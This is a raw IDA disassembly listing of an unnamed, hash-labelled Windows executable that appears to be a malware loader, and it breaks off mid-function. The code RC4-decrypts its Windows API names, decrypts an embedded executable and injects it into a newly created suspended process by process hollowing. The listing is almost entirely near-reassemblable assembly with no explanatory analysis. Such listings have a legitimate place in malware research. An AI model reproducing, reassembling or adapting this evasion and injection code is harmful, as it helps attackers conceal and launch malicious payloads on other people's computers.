;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 67E72B246FA68902935978681FA72358
; File Name : u:\work\67e72b246fa68902935978681fa72358_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000D87 ( 3463.)
; Section size in file : 00000E00 ( 3584.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401000(SIZE_T dwBytes)
sub_401000 proc near ; CODE XREF: sub_40102B+12�p
; sub_401160+12A�p ...
dwBytes = dword ptr 4
push esi
push edi
push [esp+8+dwBytes] ; dwBytes
push 0 ; uFlags
call ds:GlobalAlloc ; GlobalAlloc
mov ecx, [esp+8+dwBytes]
mov esi, ecx
mov edx, eax
shr ecx, 2
xor eax, eax
mov edi, edx
rep stosd
mov ecx, esi
and ecx, 3
rep stosb
pop edi
mov eax, edx
pop esi
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40102B proc near ; CODE XREF: sub_401780+41�p
; sub_401780+72�p ...
var_110 = byte ptr -110h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 110h
mov eax, [ebp+arg_8]
lea eax, [eax+eax*4]
shl eax, 1
push eax ; dwBytes
call sub_401000
test eax, eax
pop ecx
mov [ebp+var_C], eax
jnz short loc_40104C
leave
retn
; ---------------------------------------------------------------------------
loc_40104C: ; CODE XREF: sub_40102B+1D�j
xor eax, eax
loc_40104E: ; CODE XREF: sub_40102B+30�j
mov [ebp+eax+var_110], al
inc eax
cmp eax, 0FFh
jle short loc_40104E
and [ebp+var_8], 0
and [ebp+var_4], 0
push ebx
push esi
push edi
mov esi, 100h
loc_40106D: ; CODE XREF: sub_40102B+94�j
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
loc_401073: ; CODE XREF: sub_40102B+4D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401073
sub eax, ecx
mov edi, eax
mov eax, [ebp+var_4]
xor edx, edx
div edi
mov ecx, [ebp+var_4]
mov eax, [ebp+arg_0]
lea ecx, [ebp+ecx+var_110]
mov bl, [ecx]
mov edi, esi
movsx edx, byte ptr [edx+eax]
add edx, [ebp+var_8]
movzx eax, bl
add eax, edx
cdq
idiv edi
inc [ebp+var_4]
cmp [ebp+var_4], 0FFh
lea eax, [ebp+edx+var_110]
mov [ebp+var_8], edx
mov dl, [eax]
mov [ecx], dl
mov [eax], bl
jle short loc_40106D
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
jle short loc_401133
mov eax, [ebp+arg_4]
sub eax, [ebp+var_C]
mov [ebp+var_10], eax
loc_4010D7: ; CODE XREF: sub_40102B+106�j
mov eax, [ebp+var_4]
cdq
mov ecx, esi
idiv ecx
mov edi, esi
lea ecx, [ebp+edx+var_110]
mov bl, [ecx]
movzx eax, bl
add eax, [ebp+var_8]
cdq
idiv edi
lea eax, [ebp+edx+var_110]
mov [ebp+var_8], edx
mov dl, [eax]
mov [ecx], dl
mov edx, [ebp+var_C]
mov [eax], bl
mov eax, [ebp+var_4]
lea edi, [eax+edx]
movzx eax, byte ptr [ecx]
movzx ecx, bl
add eax, ecx
cdq
mov ecx, esi
idiv ecx
mov ecx, [ebp+var_10]
mov al, [ebp+edx+var_110]
xor al, [ecx+edi]
inc [ebp+var_4]
mov [edi], al
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_4010D7
loc_401133: ; CODE XREF: sub_40102B+A1�j
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_40102B endp
; =============== S U B R O U T I N E =======================================
sub_40113B proc near ; CODE XREF: sub_401160+4F�p
; sub_401160+A0�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xor eax, eax
cmp [esp+arg_4], eax
jle short locret_40115F
mov ecx, [esp+arg_0]
mov edx, dword_403264
add ecx, edx
loc_40114F: ; CODE XREF: sub_40113B+22�j
mov dl, [ecx+eax]
mov byte_4032E8[eax], dl
inc eax
cmp eax, [esp+arg_4]
jl short loc_40114F
locret_40115F: ; CODE XREF: sub_40113B+6�j
retn
sub_40113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401160 proc near ; CODE XREF: start+53�p
var_138 = byte ptr -138h
var_58 = byte ptr -58h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_12 = word ptr -12h
var_4 = word ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 138h
mov eax, dword_403264
push ebx
mov bl, [eax]
mov byte_403280, bl
mov cl, [eax+1]
mov byte_4032D8, cl
mov al, [eax+2]
neg byte_4032D8
push esi
mov esi, dword_4312B4
neg bl
neg al
cmp esi, 40h
mov byte_403280, bl
mov byte_403260, al
jnb short loc_4011AB
xor al, al
jmp loc_401310
; ---------------------------------------------------------------------------
loc_4011AB: ; CODE XREF: sub_401160+42�j
push 40h
push 3
call sub_40113B
pop ecx
pop ecx
mov byte_403328, 0
xor esi, esi
loc_4011BF: ; CODE XREF: sub_401160+75�j
mov cl, byte_4032D8
lea eax, dword_4032E9[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 40h
jb short loc_4011BF
push edi
push 10h
pop ecx
mov esi, offset byte_4032E8
lea edi, [ebp+var_58]
rep movsd
mov eax, [ebp+var_1C]
lea ecx, [eax+18h]
cmp dword_4312B4, ecx
jnb short loc_4011FA
loc_4011F3: ; CODE XREF: sub_401160+DE�j
xor al, al
jmp loc_40130F
; ---------------------------------------------------------------------------
loc_4011FA: ; CODE XREF: sub_401160+91�j
add eax, 3
push 18h
push eax
call sub_40113B
pop ecx
pop ecx
mov byte_403300, 0
xor esi, esi
loc_401210: ; CODE XREF: sub_401160+C6�j
mov cl, byte_4032D8
lea eax, dword_4032E9[esi]
add [eax-1], bl
add [eax], cl
inc esi
inc esi
cmp esi, 18h
jb short loc_401210
push 6
pop ecx
mov esi, offset byte_4032E8
lea edi, [ebp+var_18]
rep movsd
mov esi, 0E0h
cmp [ebp+var_4], si
jnz short loc_4011F3
mov eax, [ebp+var_1C]
add eax, 1Bh
push esi
push eax
call sub_40113B
pop ecx
pop ecx
mov byte_4033C8, 0
xor edi, edi
loc_401258: ; CODE XREF: sub_401160+10D�j
mov cl, byte_4032D8
lea eax, dword_4032E9[edi]
add [eax-1], bl
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_401258
movzx eax, [ebp+var_12]
push 38h
pop ecx
mov esi, offset byte_4032E8
lea edi, [ebp+var_138]
rep movsd
lea esi, [eax+eax*4]
shl esi, 3
push esi ; dwBytes
call sub_401000
mov ebx, eax
mov eax, [ebp+var_1C]
add eax, 0FBh
push esi
push eax
call sub_40113B
add esp, 0Ch
xor ecx, ecx
test esi, esi
mov byte_4032E8[esi], 0
jbe short loc_4012CD
loc_4012B0: ; CODE XREF: sub_401160+16B�j
mov dl, byte_403280
lea eax, dword_4032E9[ecx]
add [eax-1], dl
mov dl, byte_4032D8
add [eax], dl
inc ecx
inc ecx
cmp ecx, esi
jb short loc_4012B0
loc_4012CD: ; CODE XREF: sub_401160+14E�j
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032E8
mov edi, ebx
rep movsd
mov ecx, eax
mov eax, [ebp+arg_C]
and ecx, 3
rep movsb
mov edi, [ebp+arg_0]
push 10h
pop ecx
push 6
lea esi, [ebp+var_58]
rep movsd
mov edi, [ebp+arg_4]
pop ecx
lea esi, [ebp+var_18]
rep movsd
mov edi, [ebp+arg_8]
push 38h
pop ecx
lea esi, [ebp+var_138]
rep movsd
mov [eax], ebx
mov al, 1
loc_40130F: ; CODE XREF: sub_401160+95�j
pop edi
loc_401310: ; CODE XREF: sub_401160+46�j
pop esi
pop ebx
leave
retn
sub_401160 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401314 proc near ; CODE XREF: start+77�p
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_10]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jz short loc_401331
lea ecx, [eax+1]
imul ecx, esi
loc_401331: ; CODE XREF: sub_401314+15�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_40136B
push ebx
mov ebx, [ebp+arg_14]
push edi
add ebx, 8
mov [ebp+arg_10], eax
loc_401347: ; CODE XREF: sub_401314+53�j
mov edi, [ebx]
test edi, edi
jz short loc_401361
xor edx, edx
mov eax, edi
div esi
test edx, edx
jnz short loc_40135B
add ecx, edi
jmp short loc_401361
; ---------------------------------------------------------------------------
loc_40135B: ; CODE XREF: sub_401314+41�j
inc eax
imul eax, esi
add ecx, eax
loc_401361: ; CODE XREF: sub_401314+37�j
; sub_401314+45�j
add ebx, 28h
dec [ebp+arg_10]
jnz short loc_401347
pop edi
pop ebx
loc_40136B: ; CODE XREF: sub_401314+26�j
mov eax, ecx
pop esi
pop ebp
retn
sub_401314 endp
; =============== S U B R O U T I N E =======================================
sub_401370 proc near ; CODE XREF: sub_40138A+AA�p
; sub_40138A:loc_4014BF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor edx, edx
div [esp+arg_4]
test edx, edx
jnz short loc_401383
mov eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_401383: ; CODE XREF: sub_401370+C�j
inc eax
imul eax, [esp+arg_4]
retn
sub_401370 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40138A proc near ; CODE XREF: start+AB�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, dword_403264
push ebx
mov bl, [eax]
mov byte_403280, bl
mov cl, [eax+1]
mov byte_4032D8, cl
mov al, [eax+2]
neg byte_4032D8
neg al
mov byte_403260, al
mov eax, [ebp+arg_8]
neg bl
push esi
mov byte_403280, bl
mov esi, [eax+3Ch]
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
push edi
jle short loc_4013E4
mov ecx, [ebp+arg_C]
add ecx, 14h
loc_4013D6: ; CODE XREF: sub_40138A+58�j
mov edx, [ecx]
cmp edx, esi
jnb short loc_4013DE
mov esi, edx
loc_4013DE: ; CODE XREF: sub_40138A+50�j
add ecx, 28h
dec eax
jnz short loc_4013D6
loc_4013E4: ; CODE XREF: sub_40138A+44�j
push esi
push 3
call sub_40113B
pop ecx
xor edi, edi
test esi, esi
pop ecx
mov byte_4032E8[esi], 0
jbe short loc_401412
loc_4013FB: ; CODE XREF: sub_40138A+86�j
mov cl, byte_4032D8
lea eax, dword_4032E9[edi]
add [eax-1], bl
add [eax], cl
inc edi
inc edi
cmp edi, esi
jb short loc_4013FB
loc_401412: ; CODE XREF: sub_40138A+6F�j
mov edi, [ebp+arg_10]
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032E8
rep movsd
mov ecx, eax
mov eax, [ebp+arg_8]
and ecx, 3
rep movsb
mov ecx, [eax+20h]
push ecx
push dword ptr [eax+3Ch]
call sub_401370
add eax, [ebp+arg_10]
and [ebp+var_4], 0
mov [ebp+arg_10], eax
mov eax, [ebp+arg_4]
add esp, 8
cmp word ptr [eax+6], 0
jbe loc_4014E0
mov ebx, [ebp+arg_C]
add ebx, 8
loc_40145A: ; CODE XREF: sub_40138A+150�j
mov esi, [ebx+8]
test esi, esi
mov eax, [ebx]
jbe short loc_4014B9
cmp esi, eax
jbe short loc_401469
mov esi, eax
loc_401469: ; CODE XREF: sub_40138A+DB�j
mov eax, [ebx+0Ch]
add eax, 3
push esi
push eax
call sub_40113B
pop ecx
xor eax, eax
test esi, esi
pop ecx
mov byte_4032E8[esi], 0
jbe short loc_401496
loc_401485: ; CODE XREF: sub_40138A+10A�j
mov cl, byte_403260
add byte_4032E8[eax], cl
inc eax
cmp eax, esi
jb short loc_401485
loc_401496: ; CODE XREF: sub_40138A+F9�j
mov edi, [ebp+arg_10]
mov ecx, esi
mov eax, ecx
shr ecx, 2
mov esi, offset byte_4032E8
rep movsd
mov ecx, eax
mov eax, [ebp+arg_8]
and ecx, 3
rep movsb
mov ecx, [eax+20h]
push ecx
push dword ptr [ebx]
jmp short loc_4014BF
; ---------------------------------------------------------------------------
loc_4014B9: ; CODE XREF: sub_40138A+D7�j
test eax, eax
jz short loc_4014CA
push ecx
push eax
loc_4014BF: ; CODE XREF: sub_40138A+12D�j
call sub_401370
add esp, 8
add [ebp+arg_10], eax
loc_4014CA: ; CODE XREF: sub_40138A+131�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+6]
inc [ebp+var_4]
add ebx, 28h
cmp [ebp+var_4], eax
jl loc_40145A
loc_4014E0: ; CODE XREF: sub_40138A+C4�j
pop edi
pop esi
mov al, 1
pop ebx
leave
retn
sub_40138A endp
; =============== S U B R O U T I N E =======================================
sub_4014E7 proc near ; CODE XREF: sub_401618+C7�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov ecx, [esp+arg_8]
mov eax, [ecx+88h]
test eax, eax
jz short locret_401556
cmp dword ptr [ecx+8Ch], 0
jz short locret_401556
mov edx, [esp+arg_10]
push esi
mov esi, [esp+4+arg_14]
sub esi, [ecx+1Ch]
add eax, edx
cmp dword ptr [eax+4], 0
jz short loc_401555
push ebx
push edi
loc_401514: ; CODE XREF: sub_4014E7+6A�j
mov ecx, [eax+4]
sub ecx, 8
shr ecx, 1
test ecx, ecx
lea edi, [eax+8]
jle short loc_40154B
mov ebx, ecx
loc_401525: ; CODE XREF: sub_4014E7+62�j
xor edx, edx
mov dx, [edi]
mov ecx, edx
and ecx, 0FFFh
add ecx, [esp+0Ch+arg_10]
and dx, 0F000h
add ecx, [eax]
cmp dx, 3000h
jnz short loc_401546
add [ecx], esi
loc_401546: ; CODE XREF: sub_4014E7+5B�j
inc edi
inc edi
dec ebx
jnz short loc_401525
loc_40154B: ; CODE XREF: sub_4014E7+3A�j
cmp dword ptr [edi+4], 0
mov eax, edi
jnz short loc_401514
pop edi
pop ebx
loc_401555: ; CODE XREF: sub_4014E7+29�j
pop esi
locret_401556: ; CODE XREF: sub_4014E7+C�j
; sub_4014E7+15�j
retn
sub_4014E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401557 proc near ; CODE XREF: start+C9�p
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_4 = byte ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 48h
push esi
mov esi, [ebp+arg_10]
push edi
push 10h
pop ecx
xor edx, edx
push esi
xor eax, eax
mov [ebp+var_48], edx
lea edi, [ebp+var_44]
rep stosd
lea eax, [ebp+var_48]
push eax
push edx
push edx
push 4
push edx
push edx
push edx
push [ebp+arg_4]
push edx
call dword_43129C
test eax, eax
jz short loc_4015F5
mov edi, [ebp+arg_14]
push ebx
push edi
mov dword ptr [edi], 10007h
push dword ptr [esi+4]
call dword_4032C8
mov ebx, [ebp+arg_18]
lea eax, [ebp+var_4]
push eax
mov eax, [edi+0A4h]
push 4
push ebx
add eax, 8
push eax
push dword ptr [esi]
call dword_40327C
mov edi, [ebx]
mov ebx, offset dword_403294
jmp short loc_4015D6
; ---------------------------------------------------------------------------
loc_4015C4: ; CODE XREF: sub_401557+8E�j
cmp dword_4032A4, 10000h
jz short loc_4015E7
add edi, dword_4032A0
loc_4015D6: ; CODE XREF: sub_401557+6B�j
mov eax, [esi]
push 1Ch
push ebx
push edi
push eax
call dword_431290
test eax, eax
jnz short loc_4015C4
loc_4015E7: ; CODE XREF: sub_401557+77�j
mov eax, [ebp+arg_18]
sub edi, [eax]
pop ebx
mov [eax+4], edi
xor eax, eax
inc eax
jmp short loc_4015F7
; ---------------------------------------------------------------------------
loc_4015F5: ; CODE XREF: sub_401557+32�j
xor eax, eax
loc_4015F7: ; CODE XREF: sub_401557+9C�j
pop edi
pop esi
leave
retn
sub_401557 endp
; =============== S U B R O U T I N E =======================================
sub_4015FB proc near ; CODE XREF: sub_401618+90�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax+88h], 0
jz short loc_401615
cmp dword ptr [eax+8Ch], 0
jz short loc_401615
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_401615: ; CODE XREF: sub_4015FB+B�j
; sub_4015FB+14�j
xor eax, eax
retn
sub_4015FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401618 proc near ; CODE XREF: start+11C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
arg_34 = dword ptr 3Ch
arg_D8 = dword ptr 0E0h
arg_E4 = dword ptr 0ECh
arg_300 = dword ptr 308h
arg_304 = dword ptr 30Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_300]
cmp [eax+1Ch], edi
mov esi, 3000h
jnz short loc_401659
mov eax, [ebp+arg_304]
cmp [ebp+arg_14], eax
ja short loc_401659
mov ebx, [ebp+arg_24]
lea ecx, [ebp+arg_304]
push ecx
push 40h
push eax
push edi
push ebx
mov dword_4312B8, edi
call dword_4312A4
jmp short loc_40169C
; ---------------------------------------------------------------------------
loc_401659: ; CODE XREF: sub_401618+17�j
; sub_401618+22�j
mov ebx, [ebp+arg_24]
push edi
push ebx
mov dword_4032CC, ebx
mov dword_431294, edi
call dword_403278
test eax, eax
jnz short loc_40167B
mov byte ptr [ebp+arg_304+3], 1
loc_40167B: ; CODE XREF: sub_401618+5A�j
cmp byte ptr [ebp+arg_304+3], 1
jnz short loc_40169C
mov eax, [ebp+arg_8]
push 40h
push esi
push [ebp+arg_14]
push dword ptr [eax+1Ch]
push ebx
call dword_40326C
mov dword_4312B8, eax
loc_40169C: ; CODE XREF: sub_401618+3F�j
; sub_401618+6A�j
cmp dword_4312B8, 0
jnz short loc_4016F7
push [ebp+arg_8]
call sub_4015FB
add esp, 4
test eax, eax
jz short loc_4016F0
push 40h
push esi
push [ebp+arg_14]
push 0
push ebx
call dword_40326C
test eax, eax
mov dword_4312B8, eax
jz short loc_4016F0
mov esi, [ebp+arg_8]
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4014E7
add esp, 1Ch
cmp dword_4312B8, 0
jnz short loc_4016FA
loc_4016F0: ; CODE XREF: sub_401618+9A�j
; sub_401618+B2�j
xor eax, eax
loc_4016F2: ; CODE XREF: sub_401618+154�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4016F7: ; CODE XREF: sub_401618+8B�j
mov esi, [ebp+arg_8]
loc_4016FA: ; CODE XREF: sub_401618+D6�j
mov eax, [ebp+arg_D8]
push 0
push 4
push offset dword_4312B8
add eax, 8
push eax
push ebx
call dword_4032D4
mov eax, [ebp+arg_0]
mov eax, [eax+3Ch]
mov ecx, dword_4312B8
mov edx, [ebp+arg_10]
mov [eax+edx+34h], ecx
mov eax, dword_4312B8
cmp eax, edi
mov [ebp+arg_34], 10007h
jnz short loc_401745
mov eax, [esi+10h]
add eax, [esi+1Ch]
mov [ebp+arg_E4], eax
jmp short loc_401750
; ---------------------------------------------------------------------------
loc_401745: ; CODE XREF: sub_401618+11D�j
mov ecx, [esi+10h]
add ecx, eax
mov [ebp+arg_E4], ecx
loc_401750: ; CODE XREF: sub_401618+12B�j
mov eax, [ebp+arg_28]
lea ecx, [ebp+arg_34]
push ecx
push eax
mov dword_4312A8, ebx
mov dword_403284, eax
call dword_4032DC
xor eax, eax
inc eax
jmp short loc_4016F2
sub_401618 endp
; =============== S U B R O U T I N E =======================================
sub_40176E proc near ; CODE XREF: sub_401B31+5C�p
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
inc eax
push eax ; dwBytes
call sub_401000
pop ecx
mov dword_431298, eax
retn
sub_40176E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401780 proc near ; CODE XREF: start+26�p
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 7
pop ecx
xor eax, eax
mov [ebp+var_38], 0
lea edi, [ebp+var_37]
rep stosd
stosw
stosb
mov esi, offset aGbvcnfisugd ; "gbvcnfisugd"
lea edi, [ebp+var_18]
movsd
lea eax, [ebp+var_4]
push eax
movsd
push 13h
xor ebx, ebx
lea eax, [ebp+var_18]
push offset dword_403104
inc ebx
push eax
mov [ebp+var_8], 1Fh
mov [ebp+var_C], ebx
movsd
call sub_40102B
add esp, 0Ch
push eax
push 80000001h
call dword_4032C4
test eax, eax
jnz short loc_401824
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_C]
push eax
push 0
push 10h
lea eax, [ebp+var_18]
push offset dword_4030CC
push eax
call sub_40102B
add esp, 0Ch
push eax
push [ebp+var_4]
call dword_4312B0
test eax, eax
jnz short loc_40181B
push 2
mov edi, offset dword_402010
lea esi, [ebp+var_38]
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40181B
xor bl, bl
loc_40181B: ; CODE XREF: sub_401780+86�j
; sub_401780+97�j
push [ebp+var_4]
call dword_403270
loc_401824: ; CODE XREF: sub_401780+57�j
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
sub_401780 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40182B proc near ; CODE XREF: start+C�p
var_10 = byte ptr -10h
hModule = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov esi, offset aGbvcnfisugd ; "gbvcnfisugd"
lea edi, [ebp+var_10]
movsd
movsd
push 0Ch
lea eax, [ebp+var_10]
push offset aAKiUgGvA ; "a\\kiuGV'"
push eax
movsd
call sub_40102B
mov esi, ds:LoadLibraryA
add esp, 0Ch
push eax ; lpLibFileName
call esi ; LoadLibraryA
push 0Ch
mov [ebp+hModule], eax
lea eax, [ebp+var_10]
push offset aKOfepgGvA ; "K}OFPGV'"
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpLibFileName
call esi ; LoadLibraryA
push 9
mov edi, eax
lea eax, [ebp+var_10]
push offset dword_40317C
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpLibFileName
call esi ; LoadLibraryA
push 11h
mov ebx, eax
lea eax, [ebp+var_10]
push offset dword_4031B8
push eax
call sub_40102B
mov esi, ds:GetProcAddress
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call esi ; GetProcAddress
push 0Eh
mov dword_4032B0, eax
lea eax, [ebp+var_10]
push offset dword_403000
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 12h
mov dword_40326C, eax
lea eax, [ebp+var_10]
push offset aWjtEltiW8vjl ; "wjT\\l\nW8\\^"
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 0Bh
mov dword_4032D4, eax
lea eax, [ebp+var_10]
push offset aRZkmsusW2 ; "r}ZkS\"W2"
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [ebp+hModule] ; hModule
call esi ; GetProcAddress
push 0Bh
mov dword_403270, eax
push offset dword_4031F8
lea eax, [ebp+var_10]
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 14h
mov dword_403288, eax
lea eax, [ebp+var_10]
push offset aZohfnR ; "zohF]"
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call esi ; GetProcAddress
push 0Ch
mov dword_403278, eax
lea eax, [ebp+var_10]
push offset aRNNyWX ; "r}N]Y\x1BW*"
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 13h
mov dword_403268, eax
lea eax, [ebp+var_10]
push offset dword_403198
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call esi ; GetProcAddress
push 0Eh
mov dword_4032B4, eax
lea eax, [ebp+var_10]
push offset dword_403048
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 0Bh
mov dword_43129C, eax
lea eax, [ebp+var_10]
push offset dword_4031AC
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 10h
mov dword_403290, eax
lea eax, [ebp+var_10]
push offset dword_4030E0
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 0Ch
mov dword_4032DC, eax
lea eax, [ebp+var_10]
push offset dword_403118
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 8
mov dword_4032C0, eax
lea eax, [ebp+var_10]
push offset dword_4031CC
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 10h
mov dword_4032D0, eax
lea eax, [ebp+var_10]
push offset dword_403068
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 1Eh
mov dword_4032C8, eax
lea eax, [ebp+var_10]
push offset dword_4031D8
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push ebx ; hModule
call esi ; GetProcAddress
push 10h
mov dword_40328C, eax
lea eax, [ebp+var_10]
push offset dword_403090
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [ebp+hModule] ; hModule
call esi ; GetProcAddress
push 0Bh
mov dword_4312B0, eax
lea eax, [ebp+var_10]
push offset dword_403224
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push [ebp+hModule] ; hModule
call esi ; GetProcAddress
push 0Eh
mov dword_4032C4, eax
lea eax, [ebp+var_10]
push offset dword_40324C
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 11h
mov dword_431290, eax
lea eax, [ebp+var_10]
push offset dword_40307C
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 10h
mov dword_40327C, eax
lea eax, [ebp+var_10]
push offset dword_4030A4
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
push 12h
mov dword_4312A4, eax
lea eax, [ebp+var_10]
push offset dword_403010
push eax
call sub_40102B
add esp, 0Ch
push eax ; lpProcName
push edi ; hModule
call esi ; GetProcAddress
pop edi
pop esi
mov dword_4032E0, eax
mov al, 1
pop ebx
leave
retn
sub_40182B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401AED proc near ; CODE XREF: sub_401B31+CC�p
; sub_401B31+E9�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_C]
imul esi, 64h
push edi
inc esi
push esi ; dwBytes
call sub_401000
mov edi, eax
test edi, edi
pop ecx
jz short loc_401B2D
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push 2
call dword_40328C
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push esi
push edi
push 2
call dword_4032B4
mov eax, edi
loc_401B2D: ; CODE XREF: sub_401AED+19�j
pop edi
pop esi
leave
retn
sub_401AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B31 proc near ; CODE XREF: start+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
push ebx
push 80h
push 3
push ebx
push 1
push 80000000h
push [ebp+arg_4]
call dword_403290
push ebx
push eax
